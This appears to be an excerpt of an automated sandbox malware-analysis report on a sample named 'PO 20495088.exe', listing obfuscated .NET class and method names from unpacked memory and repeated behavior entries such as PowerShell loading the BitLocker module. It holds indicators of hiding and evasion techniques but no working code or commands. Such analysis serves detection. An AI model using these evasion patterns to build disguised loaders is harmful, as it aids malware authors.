                Source: 0.2.PO 20495088.exe.4202550.0.raw.unpack, yMIQ06HHsgARpgeyFLZ.csHigh entropy of concatenated method names: 'KZk4NQ5Owq', 'Pog4zA1njb', 'gIMBwEiV7W', 'SaABswgDl1', 'esNBhV70UW', 'VTQBLItraf', 'OyyBIXnS7o', 'fQsBTAPmNJ', 'dTfBdyhhe1', 'tXKBuNUhjf'
                Source: 0.2.PO 20495088.exe.4202550.0.raw.unpack, mIoZEuiKSLqGc1eeFE.csHigh entropy of concatenated method names: 'FKc8oYprtW', 'Nkv8rv5b4P', 'rOb8e64DxA', 'wsK8puqCc9', 'Lfw80Xb9sN', 'bdW8WMYmkT', 'DCV8Jy6ZFq', 'TqU8R89Sj6', 'gSs8EDRWfk', 'LNq8fUC0Ws'
                Source: 0.2.PO 20495088.exe.4202550.0.raw.unpack, NwCEPEzrFnkLU98RAF.csHigh entropy of concatenated method names: 'kR74q2EQG7', 'bGO4nDjRl9', 'Dew4A0FpS0', 'v9f4ogHf8E', 'DWU4rvUcot', 'VCf4pfCUMl', 'Siw40YnfkO', 'wU84KiE4QB', 'Xs74aZ0OG1', 'tUH41FSZqt'
                Source: 0.2.PO 20495088.exe.4202550.0.raw.unpack, Tg6XRevX7i4KRsbMD0.csHigh entropy of concatenated method names: 'tTQCaNFUqj', 'cWFC1Er6My', 'MTnCx6N7Vm', 'LQjCZKcX7K', 'h42CQ1340N', 'bFUCqeBIJQ', 'ufaC7aWp74', 'IhmCn5I2ZO', 'otNCAF8WHJ', 'oIVCX93IS1'
                Source: 0.2.PO 20495088.exe.4202550.0.raw.unpack, iWSyLI8pVFVVT202jS.csHigh entropy of concatenated method names: 'tF6sCAb3ZX', 'aQDsS4IKds', 'tgFsgF0P93', 'SZ5sFef87o', 'axeskZmvhe', 'VF6s6gNrLS', 'rH9bSlHcsu1TPvtdiC', 'QyuZdmA6kwYHpZXOSx', 'mZ4ss6NI4S', 'zkWsLThF85'
                Source: 0.2.PO 20495088.exe.4202550.0.raw.unpack, WcY88HmRHGlKXLbZmw.csHigh entropy of concatenated method names: 'F9wlnxSRfV', 'iJolAY5nBW', 'l0YloUx8Ps', 'oPPlrpCPQq', 'J9plp3udUp', 'dRZl0x7UKA', 'de5lJSlt2m', 'WJtlRNwVft', 'v6plf0QIPs', 'qHqly0R0Jb'
                Source: 0.2.PO 20495088.exe.4202550.0.raw.unpack, InJtUGJcH0iSuGM9D0.csHigh entropy of concatenated method names: 'ToString', 'rkX6yY5RCZ', 'OYF6rtyLwa', 'sUd6e86qBs', 'qIF6pP4GRE', 'vRV60n81Ah', 'wWJ6WFh1FD', 'Tbo6JCKnLr', 'O1j6Ri8dQG', 'UbP6EMVgUP'
                Source: 0.2.PO 20495088.exe.4202550.0.raw.unpack, u4lEdcCxML7HcjyWbk.csHigh entropy of concatenated method names: 'Dispose', 'roGsmsEv0Y', 'tF5hrek6Lv', 'QYFOM5JSEJ', 'SvYsNCXhth', 'W8cszRhDXR', 'ProcessDialogKey', 'aukhwrHAxs', 'KWshsavNKd', 'JEchhGj4b6'
                Source: 0.2.PO 20495088.exe.4202550.0.raw.unpack, yxAG4igptjhQAL7qfX.csHigh entropy of concatenated method names: 'Lu9LTosHV5', 'MBxLdfK7Dn', 'IoGLuo2u37', 'NXkLUYsB7v', 'yZVL9fYRD5', 'FfZLiQJd89', 'h56LCNZJnl', 'z6uLSVfRrt', 'gXALHKnXSa', 'LolLgpV0Tm'
                Source: 0.2.PO 20495088.exe.4202550.0.raw.unpack, ueMMeIRfrwA3ETu6f1.csHigh entropy of concatenated method names: 'v6b8kw9Hn9', 'o4f8ckWVjW', 'a4q8841hGJ', 'v4n8BYq7Vs', 'gyS8PToGqS', 'P1d8Kg4gvu', 'Dispose', 'V7Jvdw9WCu', 'o9ZvuGkrDw', 'OA9vUFwP0i'
                Source: 0.2.PO 20495088.exe.4202550.0.raw.unpack, c5btWpsiynYPfDct2o.csHigh entropy of concatenated method names: 'Fc0UZ6EJTr', 'hyHUqUS6lC', 'flaUn8e4GV', 'm2gUAp8HAV', 'CACUknm1Ig', 'tppU6sbdH1', 'q8yUc4LdSL', 'mHwUvkpyrH', 'mQ4U897qHt', 'qsGU4fF6xR'
                Source: 0.2.PO 20495088.exe.4202550.0.raw.unpack, QLyBkiYt0Go5aKO1Up.csHigh entropy of concatenated method names: 'JbKuGaKtbk', 'Nvkuj7WX6f', 'Pitu5krjjR', 'Wa5uDEOnST', 'gZBuMBUak6', 'isHu2JCOOF', 'QIouVPUbDH', 'tPNubePc2u', 'GaxumN3kEj', 'NbduNt0YRx'
                Source: 0.2.PO 20495088.exe.4202550.0.raw.unpack, qGRJwynvhE5akRdOJu.csHigh entropy of concatenated method names: 'QdLCdPvSvx', 'SRWCUfJkm9', 'NX3Civdmxw', 'v5XiNIn3Fe', 'Slkizbf9VH', 'd7KCwDdGWd', 'kA8CsYfyMq', 'nbBCh0VSdr', 'oN5CLgc9nt', 'nBuCINGhKG'
                Source: 0.2.PO 20495088.exe.7d70000.2.raw.unpack, LFRYuTGvWOMHuIMSMI.csHigh entropy of concatenated method names: 'H9KkVS3009', 'wxdkbtvLcC', 'liSkmDofnt', 'YBkkN2iil5', 'PjcvAq8W16K1x12waLK', 'GeC4Rt8DRQr1OsH9FZL', 'ih5TQ88ScZRBVFyAIuY'
                Source: 0.2.PO 20495088.exe.7d70000.2.raw.unpack, pnLbb94JCMiLfVIuHb.csHigh entropy of concatenated method names: 'p2e4UMZ2uu', 'TlE49CJ1eZ', 'o2W4i74ku8', 'GcU4CKRtbb', 'idt486GQRG', 'sqc4Syuo89', 'Next', 'Next', 'Next', 'NextBytes'
                Source: 0.2.PO 20495088.exe.7d70000.2.raw.unpack, FBMo2BQar0VrdJhNfA.csHigh entropy of concatenated method names: 'mpIkf4bXOA', 'w8OkYG9MUl', 'NWCkGUEoUY', 'whykjaqsvs', 'HANkrnaJrQ', 'Kq6ke6xmnF', 'fkrkptRbcy', 'v4yk05v7Lw', 'gYBkWX41xI', 'reJkJLd84Y'
                Source: 0.2.PO 20495088.exe.7d70000.2.raw.unpack, bPWVTiE5Z9HKxopMdc.csHigh entropy of concatenated method names: 'pojcb7stAW', 'voVcNiJNbu', 'oRcvwTblRj', 'relvsbXOOE', 'tvBcy7wxDd', 'Os9cYc4YLZ', 'Vctc3nifeE', 'AoKcGRfn6k', 'jvAcj3VvdX', 'xDpc5QgQ2y'
                Source: 0.2.PO 20495088.exe.7d70000.2.raw.unpack, tyALKZSpnBFiSHeyWo.csHigh entropy of concatenated method names: 'tbZxgwXRS', 'aIJZShBtK', 'eANqaUtU6', 'JSD7esr61', 'KnRAxWPWE', 'poIXLfcGo', 'loX9qtxJu2Hvh3Evhq', 'Pmb9gKcUOx15hv6YTb', 'Dd3vtQuRJ', 'xiI4OMn2F'
                Source: 0.2.PO 20495088.exe.7d70000.2.raw.unpack, LaABg007jsrdOW4gMH.csHigh entropy of concatenated method names: 'cPZiTYSMFq', 'xtRiueQjds', 'BK0i9LSE6l', 'IY5iCY4pP8', 'NAOiS2Fgsg', 'lvl9MVAcPI', 'VcZ92Xrego', 'p5H9VXhaw1', 'FT19bH72de', 'yFT9m9jasf'
                Source: 0.2.PO 20495088.exe.7d70000.2.raw.unpack, LXh1rrbtkEYvTPYdLc.csHigh entropy of concatenated method names: 'oAB9QaMIUf', 'NWF975udC9', 'Y8AUeEqfsW', 'SW0UpbLHKr', 'R7CU0tIRta', 'S47UWlTIxj', 'VSFUJXLGiG', 'uqHURw66T6', 'TqRUEOhVyG', 's3RUfAUOFQ'
                Source: 0.2.PO 20495088.exe.7d70000.2.raw.unpack, ClpgZZH8XG7DZVYVUb3.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'bj7O8myEBn', 'inMO40uy0M', 'rdeOB4fo3c', 'q3COO0ps60', 'nkyOP8BaUP', 'FImOtOm0bI', 'e51OKY4D6v'
                Source: 0.2.PO 20495088.exe.7d70000.2.raw.unpack, EbZ842HBJFhIslYw36j.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'cKo4yEWFaQ', 'G244YqmJKA', 'Log43C3XbE', 'Etk4GGNClC', 'ytr4jLNgwd', 'Xq445WLDCE', 'sDF4DZAesj'
                Source: 0.2.PO 20495088.exe.7d70000.2.raw.unpack, gaLxhIcHqu4ohILFAv.csHigh entropy of concatenated method names: 'aqhcgdfuIe', 'XLqcFrJwKm', 'ToString', 'ocncdlpX6c', 'bLRcuPsTO7', 'zs3cUtPW0D', 'i78c9cdoJP', 'pxDci36vZl', 'W91cCHABym', 'xTqcStLoqn'
                Source: 0.2.PO 20495088.exe.7d70000.2.raw.unpack, dK3DXQMMhvybSpbFoC.csHigh entropy of concatenated method names: 'EditValue', 'GetEditStyle', 'cV7hmGmSPH', 'tMchNYJ0fp', 'VoghzNVgEd', 'K58LwEARN3', 'OhfLs5LcLx', 'e9vLhHMfFf', 'P4PLLvG7IT', 'AJ6M9AhZ4KLbTX44wae'
                Source: 0.2.PO 20495088.exe.7d70000.2.raw.unpack, yMIQ06HHsgARpgeyFLZ.csHigh entropy of concatenated method names: 'KZk4NQ5Owq', 'Pog4zA1njb', 'gIMBwEiV7W', 'SaABswgDl1', 'esNBhV70UW', 'VTQBLItraf', 'OyyBIXnS7o', 'fQsBTAPmNJ', 'dTfBdyhhe1', 'tXKBuNUhjf'
                Source: 0.2.PO 20495088.exe.7d70000.2.raw.unpack, mIoZEuiKSLqGc1eeFE.csHigh entropy of concatenated method names: 'FKc8oYprtW', 'Nkv8rv5b4P', 'rOb8e64DxA', 'wsK8puqCc9', 'Lfw80Xb9sN', 'bdW8WMYmkT', 'DCV8Jy6ZFq', 'TqU8R89Sj6', 'gSs8EDRWfk', 'LNq8fUC0Ws'
                Source: 0.2.PO 20495088.exe.7d70000.2.raw.unpack, NwCEPEzrFnkLU98RAF.csHigh entropy of concatenated method names: 'kR74q2EQG7', 'bGO4nDjRl9', 'Dew4A0FpS0', 'v9f4ogHf8E', 'DWU4rvUcot', 'VCf4pfCUMl', 'Siw40YnfkO', 'wU84KiE4QB', 'Xs74aZ0OG1', 'tUH41FSZqt'
                Source: 0.2.PO 20495088.exe.7d70000.2.raw.unpack, Tg6XRevX7i4KRsbMD0.csHigh entropy of concatenated method names: 'tTQCaNFUqj', 'cWFC1Er6My', 'MTnCx6N7Vm', 'LQjCZKcX7K', 'h42CQ1340N', 'bFUCqeBIJQ', 'ufaC7aWp74', 'IhmCn5I2ZO', 'otNCAF8WHJ', 'oIVCX93IS1'
                Source: 0.2.PO 20495088.exe.7d70000.2.raw.unpack, iWSyLI8pVFVVT202jS.csHigh entropy of concatenated method names: 'tF6sCAb3ZX', 'aQDsS4IKds', 'tgFsgF0P93', 'SZ5sFef87o', 'axeskZmvhe', 'VF6s6gNrLS', 'rH9bSlHcsu1TPvtdiC', 'QyuZdmA6kwYHpZXOSx', 'mZ4ss6NI4S', 'zkWsLThF85'
                Source: 0.2.PO 20495088.exe.7d70000.2.raw.unpack, WcY88HmRHGlKXLbZmw.csHigh entropy of concatenated method names: 'F9wlnxSRfV', 'iJolAY5nBW', 'l0YloUx8Ps', 'oPPlrpCPQq', 'J9plp3udUp', 'dRZl0x7UKA', 'de5lJSlt2m', 'WJtlRNwVft', 'v6plf0QIPs', 'qHqly0R0Jb'
                Source: 0.2.PO 20495088.exe.7d70000.2.raw.unpack, InJtUGJcH0iSuGM9D0.csHigh entropy of concatenated method names: 'ToString', 'rkX6yY5RCZ', 'OYF6rtyLwa', 'sUd6e86qBs', 'qIF6pP4GRE', 'vRV60n81Ah', 'wWJ6WFh1FD', 'Tbo6JCKnLr', 'O1j6Ri8dQG', 'UbP6EMVgUP'
                Source: 0.2.PO 20495088.exe.7d70000.2.raw.unpack, u4lEdcCxML7HcjyWbk.csHigh entropy of concatenated method names: 'Dispose', 'roGsmsEv0Y', 'tF5hrek6Lv', 'QYFOM5JSEJ', 'SvYsNCXhth', 'W8cszRhDXR', 'ProcessDialogKey', 'aukhwrHAxs', 'KWshsavNKd', 'JEchhGj4b6'
                Source: 0.2.PO 20495088.exe.7d70000.2.raw.unpack, yxAG4igptjhQAL7qfX.csHigh entropy of concatenated method names: 'Lu9LTosHV5', 'MBxLdfK7Dn', 'IoGLuo2u37', 'NXkLUYsB7v', 'yZVL9fYRD5', 'FfZLiQJd89', 'h56LCNZJnl', 'z6uLSVfRrt', 'gXALHKnXSa', 'LolLgpV0Tm'
                Source: 0.2.PO 20495088.exe.7d70000.2.raw.unpack, ueMMeIRfrwA3ETu6f1.csHigh entropy of concatenated method names: 'v6b8kw9Hn9', 'o4f8ckWVjW', 'a4q8841hGJ', 'v4n8BYq7Vs', 'gyS8PToGqS', 'P1d8Kg4gvu', 'Dispose', 'V7Jvdw9WCu', 'o9ZvuGkrDw', 'OA9vUFwP0i'
                Source: 0.2.PO 20495088.exe.7d70000.2.raw.unpack, c5btWpsiynYPfDct2o.csHigh entropy of concatenated method names: 'Fc0UZ6EJTr', 'hyHUqUS6lC', 'flaUn8e4GV', 'm2gUAp8HAV', 'CACUknm1Ig', 'tppU6sbdH1', 'q8yUc4LdSL', 'mHwUvkpyrH', 'mQ4U897qHt', 'qsGU4fF6xR'
                Source: 0.2.PO 20495088.exe.7d70000.2.raw.unpack, QLyBkiYt0Go5aKO1Up.csHigh entropy of concatenated method names: 'JbKuGaKtbk', 'Nvkuj7WX6f', 'Pitu5krjjR', 'Wa5uDEOnST', 'gZBuMBUak6', 'isHu2JCOOF', 'QIouVPUbDH', 'tPNubePc2u', 'GaxumN3kEj', 'NbduNt0YRx'
                Source: 0.2.PO 20495088.exe.7d70000.2.raw.unpack, qGRJwynvhE5akRdOJu.csHigh entropy of concatenated method names: 'QdLCdPvSvx', 'SRWCUfJkm9', 'NX3Civdmxw', 'v5XiNIn3Fe', 'Slkizbf9VH', 'd7KCwDdGWd', 'kA8CsYfyMq', 'nbBCh0VSdr', 'oN5CLgc9nt', 'nBuCINGhKG'

                Hooking and other Techniques for Hiding and Protection

                barindex
                Loading BitLocker PowerShell Module
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                Source: C:\Users\user\Desktop\PO 20495088.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\PO 20495088.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\PO 20495088.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\PO 20495088.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\PO 20495088.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\PO 20495088.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\PO 20495088.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\PO 20495088.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\PO 20495088.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\PO 20495088.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\PO 20495088.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\PO 20495088.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\PO 20495088.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\PO 20495088.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\PO 20495088.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\PO 20495088.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\PO 20495088.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\PO 20495088.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\PO 20495088.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\PO 20495088.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\PO 20495088.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\PO 20495088.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\PO 20495088.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\PO 20495088.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\PO 20495088.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\PO 20495088.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\PO 20495088.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\PO 20495088.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\PO 20495088.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\PO 20495088.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\PO 20495088.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\PO 20495088.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\PO 20495088.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\PO 20495088.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\PO 20495088.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\PO 20495088.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\PO 20495088.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\PO 20495088.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\PO 20495088.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\PO 20495088.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\PO 20495088.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
